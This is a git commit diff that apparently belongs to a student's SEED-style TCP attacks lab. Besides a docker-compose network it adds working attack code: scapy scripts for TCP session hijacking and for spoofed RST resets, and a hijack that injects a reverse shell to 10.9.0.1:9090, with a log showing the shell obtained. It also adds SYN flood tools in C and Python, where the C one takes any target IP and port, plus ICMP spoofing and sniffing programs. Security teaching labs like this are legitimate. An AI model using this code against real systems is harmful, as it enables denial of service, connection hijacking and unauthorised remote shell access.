tcp lab almost finished and mitnick lab initialized

Tcp/Labsetup/docker-compose.yml

@@ -0,0 +1,71 @@
+version: "3"
+
+services:
+    attacker:
+        image: handsonsecurity/seed-ubuntu:large
+        container_name: seed-attacker
+        tty: true
+        cap_add:
+                - ALL
+        privileged: true
+        volumes:
+                - ./volumes:/volumes
+        network_mode: host
+
+
+    Victim:
+        image: handsonsecurity/seed-ubuntu:large
+        container_name: victim-10.9.0.5
+        tty: true
+        cap_add:
+                - ALL
+        privileged: true
+        sysctls:
+                - net.ipv4.tcp_syncookies=0
+
+        networks:
+            net-10.9.0.0:
+                ipv4_address: 10.9.0.5
+
+        command: bash -c "
+                      /etc/init.d/openbsd-inetd start  &&
+                      tail -f /dev/null
+                 "
+                  
+    User1:
+        image: handsonsecurity/seed-ubuntu:large
+        container_name: user1-10.9.0.6
+        tty: true
+        cap_add:
+                - ALL
+        networks:
+            net-10.9.0.0:
+                ipv4_address: 10.9.0.6
+
+        command: bash -c "
+                      /etc/init.d/openbsd-inetd start  &&
+                      tail -f /dev/null
+                 "
+
+    User2:
+        image: handsonsecurity/seed-ubuntu:large
+        container_name: user2-10.9.0.7
+        tty: true
+        cap_add:
+                - ALL
+        networks:
+            net-10.9.0.0:
+                ipv4_address: 10.9.0.7
+
+        command: bash -c "
+                      /etc/init.d/openbsd-inetd start  &&
+                      tail -f /dev/null
+                 "
+
+networks:
+    net-10.9.0.0:
+        name: net-10.9.0.0
+        ipam:
+            config:
+                - subnet: 10.9.0.0/24
+

Tcp/Labsetup/volumes/hijack_attack.py

@@ -0,0 +1,23 @@
+#!/usr/bin/env python3
+from scapy.all import *
+
+def hijack(pkt):
+    if pkt[TCP].payload:
+        data = bytes(pkt[TCP].payload)
+        print("Packet from {} to {} with payload: {}".format(pkt[IP].src, pkt[IP].dst, data))
+        
+        # Look for 'id' which I sent in the telnet session
+        if b'id' in data:
+            print("Target command detected. Injecting...")
+            ip = IP(src=pkt[IP].src, dst=pkt[IP].dst)
+            tcp = TCP(sport=pkt[TCP].sport, dport=pkt[TCP].dport, flags="A",
+                      seq=pkt[TCP].seq + len(pkt[TCP].payload), ack=pkt[TCP].ack)
+            
+            payload = "\r touch /tmp/hijack_successful \r"
+            res = ip/tcp/payload
+            send(res, verbose=0)
+            print("Sent hijacked packet.")
+            exit(0)
+
+print("Sniffing...")
+sniff(iface="br-603d3788c443", filter="tcp and src host 10.9.0.6 and dst host 10.9.0.5", prn=hijack)

Tcp/Labsetup/volumes/reset_attack.py

@@ -0,0 +1,14 @@
+#!/usr/bin/env python3
+from scapy.all import *
+
+def spoof_reset(pkt):
+    print("Detected TCP packet from {} to {}".format(pkt[IP].src, pkt[IP].dst))
+    ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
+    tcp = TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, flags="R", seq=pkt[TCP].ack)
+    res = ip/tcp
+    send(res, verbose=0)
+    print("Sent spoofed RST packet to terminate connection.")
+    exit(0)
+
+print("Sniffing for telnet traffic on br-603d3788c443...")
+sniff(iface="br-603d3788c443", filter="tcp and src host 10.9.0.6 and dst host 10.9.0.5", prn=spoof_reset)

Tcp/Labsetup/volumes/reverse_shell.log

@@ -0,0 +1,3 @@
+Listening on 0.0.0.0 9090
+Connection received on 10.9.0.5 54776
+seed@4163e58af35c:~$ 

Tcp/Labsetup/volumes/reverse_shell_attack.py

@@ -0,0 +1,21 @@
+#!/usr/bin/env python3
+from scapy.all import *
+
+def hijack(pkt):
+    if pkt[TCP].payload:
+        data = bytes(pkt[TCP].payload)
+        if b'id' in data:
+            print("Target command detected. Injecting reverse shell...")
+            ip = IP(src=pkt[IP].src, dst=pkt[IP].dst)
+            tcp = TCP(sport=pkt[TCP].sport, dport=pkt[TCP].dport, flags="A",
+                      seq=pkt[TCP].seq + len(pkt[TCP].payload), ack=pkt[TCP].ack)
+            
+            # Use 10.9.0.1 for the attacker listener
+            payload = "\r /bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1 \r"
+            res = ip/tcp/payload
+            send(res, verbose=0)
+            print("Sent hijacked packet with reverse shell.")
+            exit(0)
+
+print("Sniffing...")
+sniff(iface="br-603d3788c443", filter="tcp and src host 10.9.0.6 and dst host 10.9.0.5", prn=hijack)

Tcp/Labsetup/volumes/sniff_and_spoof.c

@@ -0,0 +1,107 @@
+#include <pcap.h>
+#include <stdio.h>
+#include <string.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+
+struct ipheader {
+  unsigned char      iph_ihl:4, iph_ver:4;
+  unsigned char      iph_tos;
+  unsigned short int iph_len;
+  unsigned short int iph_ident;
+  unsigned short int iph_flag:3, iph_offset:13;
+  unsigned char      iph_ttl;
+  unsigned char      iph_protocol;
+  unsigned short int iph_chksum;
+  struct  in_addr    iph_sourceip;
+  struct  in_addr    iph_destip;
+};
+
+struct icmpheader {
+  unsigned char icmp_type;
+  unsigned char icmp_code;
+  unsigned short int icmp_chksum;
+  unsigned short int icmp_id;
+  unsigned short int icmp_seq;
+};
+
+unsigned short in_cksum (unsigned short *buf, int length)
+{
+   unsigned short *w = buf;
+   int nleft = length;
+   int sum = 0;
+   unsigned short temp=0;
+
+   while (nleft > 1)  {
+       sum += *w++;
+       nleft -= 2;
+   }
+
+   if (nleft == 1) {
+        *(u_char *)(&temp) = *(u_char *)w ;
+        sum += temp;
+   }
+
+   sum = (sum >> 16) + (sum & 0xffff);
+   sum += (sum >> 16);
+   return (unsigned short)(~sum);
+}
+
+void send_raw_ip_packet(struct ipheader* ip)
+{
+    struct sockaddr_in dest_info;
+    int enable = 1;
+
+    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
+    setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable));
+
+    dest_info.sin_family = AF_INET;
+    dest_info.sin_addr = ip->iph_destip;
+
+    sendto(sock, ip, ntohs(ip->iph_len), 0, (struct sockaddr *)&dest_info, sizeof(dest_info));
+    close(sock);
+}
+
+void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
+{
+  struct ipheader *ip = (struct ipheader *)(packet + 14);
+  struct icmpheader *icmp = (struct icmpheader *)(packet + 14 + (ip->iph_ihl * 4));
+
+  if (icmp->icmp_type == 8) { // Echo Request
+      printf("Detected Echo Request from %s to %s\n", inet_ntoa(ip->iph_sourceip), inet_ntoa(ip->iph_destip));
+      
+      char buffer[1500];
+      int ip_len = ntohs(ip->iph_len);
+      memcpy(buffer, ip, ip_len);
+      
+      struct ipheader *new_ip = (struct ipheader *) buffer;
+      struct icmpheader *new_icmp = (struct icmpheader *) (buffer + (new_ip->iph_ihl * 4));
+      
+      new_ip->iph_sourceip = ip->iph_destip;
+      new_ip->iph_destip = ip->iph_sourceip;
+      new_ip->iph_ttl = 64;
+      
+      new_icmp->icmp_type = 0; // Echo Reply
+      new_icmp->icmp_chksum = 0;
+      new_icmp->icmp_chksum = in_cksum((unsigned short *)new_icmp, ip_len - (new_ip->iph_ihl * 4));
+      
+      send_raw_ip_packet(new_ip);
+      printf("Sent spoofed Echo Reply back to %s\n", inet_ntoa(new_ip->iph_destip));
+  }
+}
+
+int main()
+{
+  pcap_t *handle;
+  char errbuf[PCAP_ERRBUF_SIZE];
+  struct bpf_program fp;
+  char filter_exp[] = "icmp";
+  bpf_u_int32 net;
+
+  handle = pcap_open_live("br-603d3788c443", BUFSIZ, 1, 1000, errbuf);
+  pcap_compile(handle, &fp, filter_exp, 0, net);
+  pcap_setfilter(handle, &fp);
+  pcap_loop(handle, -1, got_packet, NULL);
+  pcap_close(handle);
+  return 0;
+}

Tcp/Labsetup/volumes/sniffer.c

@@ -0,0 +1,52 @@
+#include <pcap.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <arpa/inet.h>
+
+struct ipheader {
+  unsigned char      iph_ihl:4, iph_ver:4;
+  unsigned char      iph_tos;
+  unsigned short int iph_len;
+  unsigned short int iph_ident;
+  unsigned short int iph_flag:3, iph_offset:13;
+  unsigned char      iph_ttl;
+  unsigned char      iph_protocol;
+  unsigned short int iph_chksum;
+  struct  in_addr    iph_sourceip;
+  struct  in_addr    iph_destip;
+};
+
+void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
+{
+  struct ipheader *ip = (struct ipheader *)(packet + 14); // Skip ethernet header
+  printf("Got a packet\n");
+  printf("   From: %s\n", inet_ntoa(ip->iph_sourceip));
+  printf("     To: %s\n", inet_ntoa(ip->iph_destip));
+  fflush(stdout);
+}
+
+int main()
+{
+  pcap_t *handle;
+  char errbuf[PCAP_ERRBUF_SIZE];
+  struct bpf_program fp;
+  char filter_exp[] = "icmp";
+  bpf_u_int32 net;
+
+  // Change interface name to the correct one
+  handle = pcap_open_live("br-603d3788c443", BUFSIZ, 1, 1000, errbuf);
+  if (handle == NULL) {
+      fprintf(stderr, "Couldn't open device: %s\n", errbuf);
+      return 2;
+  }
+
+  pcap_compile(handle, &fp, filter_exp, 0, net);
+  if (pcap_setfilter(handle, &fp) != 0) {
+      pcap_perror(handle, "Error:");
+      exit(EXIT_FAILURE);
+  }
+
+  pcap_loop(handle, -1, got_packet, NULL);
+  pcap_close(handle);
+  return 0;
+}

Tcp/Labsetup/volumes/sniffer.log

@@ -0,0 +1,6 @@
+Got a packet
+   From: 1.2.3.4
+     To: 10.9.0.5
+Got a packet
+   From: 10.9.0.5
+     To: 1.2.3.4

Tcp/Labsetup/volumes/spoofer.c

@@ -0,0 +1,88 @@
+#include <stdio.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/ip.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+
+struct ipheader {
+  unsigned char      iph_ihl:4, iph_ver:4;
+  unsigned char      iph_tos;
+  unsigned short int iph_len;
+  unsigned short int iph_ident;
+  unsigned short int iph_flag:3, iph_offset:13;
+  unsigned char      iph_ttl;
+  unsigned char      iph_protocol;
+  unsigned short int iph_chksum;
+  struct  in_addr    iph_sourceip;
+  struct  in_addr    iph_destip;
+};
+
+struct icmpheader {
+  unsigned char icmp_type;
+  unsigned char icmp_code;
+  unsigned short int icmp_chksum;
+  unsigned short int icmp_id;
+  unsigned short int icmp_seq;
+};
+
+unsigned short in_cksum (unsigned short *buf, int length)
+{
+   unsigned short *w = buf;
+   int nleft = length;
+   int sum = 0;
+   unsigned short temp=0;
+
+   while (nleft > 1)  {
+       sum += *w++;
+       nleft -= 2;
+   }
+
+   if (nleft == 1) {
+        *(u_char *)(&temp) = *(u_char *)w ;
+        sum += temp;
+   }
+
+   sum = (sum >> 16) + (sum & 0xffff);
+   sum += (sum >> 16);
+   return (unsigned short)(~sum);
+}
+
+void send_raw_ip_packet(struct ipheader* ip)
+{
+    struct sockaddr_in dest_info;
+    int enable = 1;
+
+    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
+    setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable));
+
+    dest_info.sin_family = AF_INET;
+    dest_info.sin_addr = ip->iph_destip;
+
+    sendto(sock, ip, ntohs(ip->iph_len), 0, (struct sockaddr *)&dest_info, sizeof(dest_info));
+    close(sock);
+}
+
+int main() {
+   char buffer[1500];
+   memset(buffer, 0, 1500);
+
+   struct icmpheader *icmp = (struct icmpheader *)(buffer + sizeof(struct ipheader));
+   icmp->icmp_type = 8; // ICMP Echo Request
+   icmp->icmp_chksum = 0;
+   icmp->icmp_chksum = in_cksum((unsigned short *)icmp, sizeof(struct icmpheader));
+
+   struct ipheader *ip = (struct ipheader *) buffer;
+   ip->iph_ver = 4;
+   ip->iph_ihl = 5;
+   ip->iph_ttl = 20;
+   ip->iph_sourceip.s_addr = inet_addr("1.2.3.4");
+   ip->iph_destip.s_addr = inet_addr("10.9.0.5");
+   ip->iph_protocol = IPPROTO_ICMP;
+   ip->iph_len = htons(sizeof(struct ipheader) + sizeof(struct icmpheader));
+
+   send_raw_ip_packet(ip);
+   printf("Spoofed ICMP packet sent from 1.2.3.4 to 10.9.0.5\n");
+
+   return 0;
+}

Tcp/Labsetup/volumes/synflood.c

@@ -0,0 +1,213 @@
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <time.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/ip.h>
+#include <arpa/inet.h>
+
+/* IP Header */
+struct ipheader {
+  unsigned char      iph_ihl:4, //IP header length
+                     iph_ver:4; //IP version
+  unsigned char      iph_tos; //Type of service
+  unsigned short int iph_len; //IP Packet length (data + header)
+  unsigned short int iph_ident; //Identification
+  unsigned short int iph_flag:3, //Fragmentation flags
+                     iph_offset:13; //Flags offset
+  unsigned char      iph_ttl; //Time to Live
+  unsigned char      iph_protocol; //Protocol type
+  unsigned short int iph_chksum; //IP datagram checksum
+  struct  in_addr    iph_sourceip; //Source IP address
+  struct  in_addr    iph_destip;   //Destination IP address
+};
+
+
+/* TCP Header */
+struct tcpheader {
+    u_short tcp_sport;               /* source port */
+    u_short tcp_dport;               /* destination port */
+    u_int   tcp_seq;                 /* sequence number */
+    u_int   tcp_ack;                 /* acknowledgement number */
+    u_char  tcp_offx2;               /* data offset, rsvd */
+#define TH_OFF(th)      (((th)->tcp_offx2 & 0xf0) >> 4)
+    u_char  tcp_flags;
+#define TH_FIN  0x01
+#define TH_SYN  0x02
+#define TH_RST  0x04
+#define TH_PUSH 0x08
+#define TH_ACK  0x10
+#define TH_URG  0x20
+#define TH_ECE  0x40
+#define TH_CWR  0x80
+#define TH_FLAGS        (TH_FIN|TH_SYN|TH_RST|TH_ACK|TH_URG|TH_ECE|TH_CWR)
+    u_short tcp_win;                 /* window */
+    u_short tcp_sum;                 /* checksum */
+    u_short tcp_urp;                 /* urgent pointer */
+};
+
+/* Psuedo TCP header */
+struct pseudo_tcp
+{
+        unsigned saddr, daddr;
+        unsigned char mbz;
+        unsigned char ptcl;
+        unsigned short tcpl;
+        struct tcpheader tcp;
+        char payload[1500];
+};
+
+//#define DEST_IP    "10.9.0.5"
+//#define DEST_PORT  23  // Attack the web server
+#define PACKET_LEN 1500
+
+unsigned short calculate_tcp_checksum(struct ipheader *ip);
+
+/*************************************************************
+  Given an IP packet, send it out using a raw socket.
+**************************************************************/
+void send_raw_ip_packet(struct ipheader* ip)
+{
+    struct sockaddr_in dest_info;
+    int enable = 1;
+
+    // Step 1: Create a raw network socket.
+    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
+    if (sock < 0) {
+      fprintf(stderr, "socket() failed: %s\n", strerror(errno));
+      exit(1);
+    }
+
+    // Step 2: Set socket option.
+    setsockopt(sock, IPPROTO_IP, IP_HDRINCL,
+                     &enable, sizeof(enable));
+
+    // Step 3: Provide needed information about destination.
+    dest_info.sin_family = AF_INET;
+    dest_info.sin_addr = ip->iph_destip;
+
+    // Step 4: Send the packet out.
+    sendto(sock, ip, ntohs(ip->iph_len), 0,
+           (struct sockaddr *)&dest_info, sizeof(dest_info));
+    close(sock);
+}
+
+
+/******************************************************************
+  Spoof a TCP SYN packet.
+*******************************************************************/
+int main(int argc, char *argv[]) {
+   char buffer[PACKET_LEN];
+   struct ipheader *ip = (struct ipheader *) buffer;
+   struct tcpheader *tcp = (struct tcpheader *) (buffer +
+                                   sizeof(struct ipheader));
+
+   if (argc < 3) {
+     printf("Please provide IP and Port number\n");
+     printf("Usage: synflood ip port\n");
+     exit(1);
+   }
+
+   char *DEST_IP   = argv[1];
+   int DEST_PORT   = atoi(argv[2]);
+
+
+   srand(time(0)); // Initialize the seed for random # generation.
+   while (1) {
+     memset(buffer, 0, PACKET_LEN);
+     /*********************************************************
+        Step 1: Fill in the TCP header.
+     ********************************************************/
+     tcp->tcp_sport = rand(); // Use random source port
+     tcp->tcp_dport = htons(DEST_PORT);
+     tcp->tcp_seq   = rand(); // Use random sequence #
+     tcp->tcp_offx2 = 0x50;
+     tcp->tcp_flags = TH_SYN; // Enable the SYN bit
+     tcp->tcp_win   = htons(20000);
+     tcp->tcp_sum   = 0;
+
+     /*********************************************************
+        Step 2: Fill in the IP header.
+     ********************************************************/
+     ip->iph_ver = 4;   // Version (IPV4)
+     ip->iph_ihl = 5;   // Header length
+     ip->iph_ttl = 50;  // Time to live
+     ip->iph_sourceip.s_addr = rand(); // Use a random IP address
+     ip->iph_destip.s_addr = inet_addr(DEST_IP);
+     ip->iph_protocol = IPPROTO_TCP; // The value is 6.
+     ip->iph_len = htons(sizeof(struct ipheader) +
+                         sizeof(struct tcpheader));
+
+     // Calculate tcp checksum
+     tcp->tcp_sum = calculate_tcp_checksum(ip);
+
+     /*********************************************************
+       Step 3: Finally, send the spoofed packet
+     ********************************************************/
+     send_raw_ip_packet(ip);
+   }
+
+   return 0;
+}
+
+
+unsigned short in_cksum (unsigned short *buf, int length)
+{
+   unsigned short *w = buf;
+   int nleft = length;
+   int sum = 0;
+   unsigned short temp=0;
+
+   /*
+    * The algorithm uses a 32 bit accumulator (sum), adds
+    * sequential 16 bit words to it, and at the end, folds back all
+    * the carry bits from the top 16 bits into the lower 16 bits.
+    */
+   while (nleft > 1)  {
+       sum += *w++;
+       nleft -= 2;
+   }
+
+   /* treat the odd byte at the end, if any */
+   if (nleft == 1) {
+        *(u_char *)(&temp) = *(u_char *)w ;
+        sum += temp;
+   }
+
+   /* add back carry outs from top 16 bits to low 16 bits */
+   sum = (sum >> 16) + (sum & 0xffff);  // add hi 16 to low 16
+   sum += (sum >> 16);                  // add carry
+   return (unsigned short)(~sum);
+}
+
+/****************************************************************
+  TCP checksum is calculated on the pseudo header, which includes
+  the TCP header and data, plus some part of the IP header.
+  Therefore, we need to construct the pseudo header first.
+*****************************************************************/
+
+
+unsigned short calculate_tcp_checksum(struct ipheader *ip)
+{
+   struct tcpheader *tcp = (struct tcpheader *)((u_char *)ip +
+                            sizeof(struct ipheader));
+
+   int tcp_len = ntohs(ip->iph_len) - sizeof(struct ipheader);
+
+   /* pseudo tcp header for the checksum computation */
+   struct pseudo_tcp p_tcp;
+   memset(&p_tcp, 0x0, sizeof(struct pseudo_tcp));
+
+   p_tcp.saddr  = ip->iph_sourceip.s_addr;
+   p_tcp.daddr  = ip->iph_destip.s_addr;
+   p_tcp.mbz    = 0;
+   p_tcp.ptcl   = IPPROTO_TCP;
+   p_tcp.tcpl   = htons(tcp_len);
+   memcpy(&p_tcp.tcp, tcp, tcp_len);
+
+   return  (unsigned short) in_cksum((unsigned short *)&p_tcp,
+                                     tcp_len + 12);
+}
+

Tcp/Labsetup/volumes/synflood.py

@@ -0,0 +1,14 @@
+#!/bin/env python3
+from scapy.all import IP, TCP, send
+from ipaddress import IPv4Address
+from random import getrandbits
+
+ip = IP(dst="10.9.0.5")
+tcp = TCP(dport=23, flags='S')
+pkt = ip/tcp
+
+while True:
+    pkt[IP].src = str(IPv4Address(getrandbits(32))) # 源 IP
+    pkt[TCP].sport = getrandbits(16) # 源端口号
+    pkt[TCP].seq = getrandbits(32) # 序列号
+    send(pkt, verbose = 0)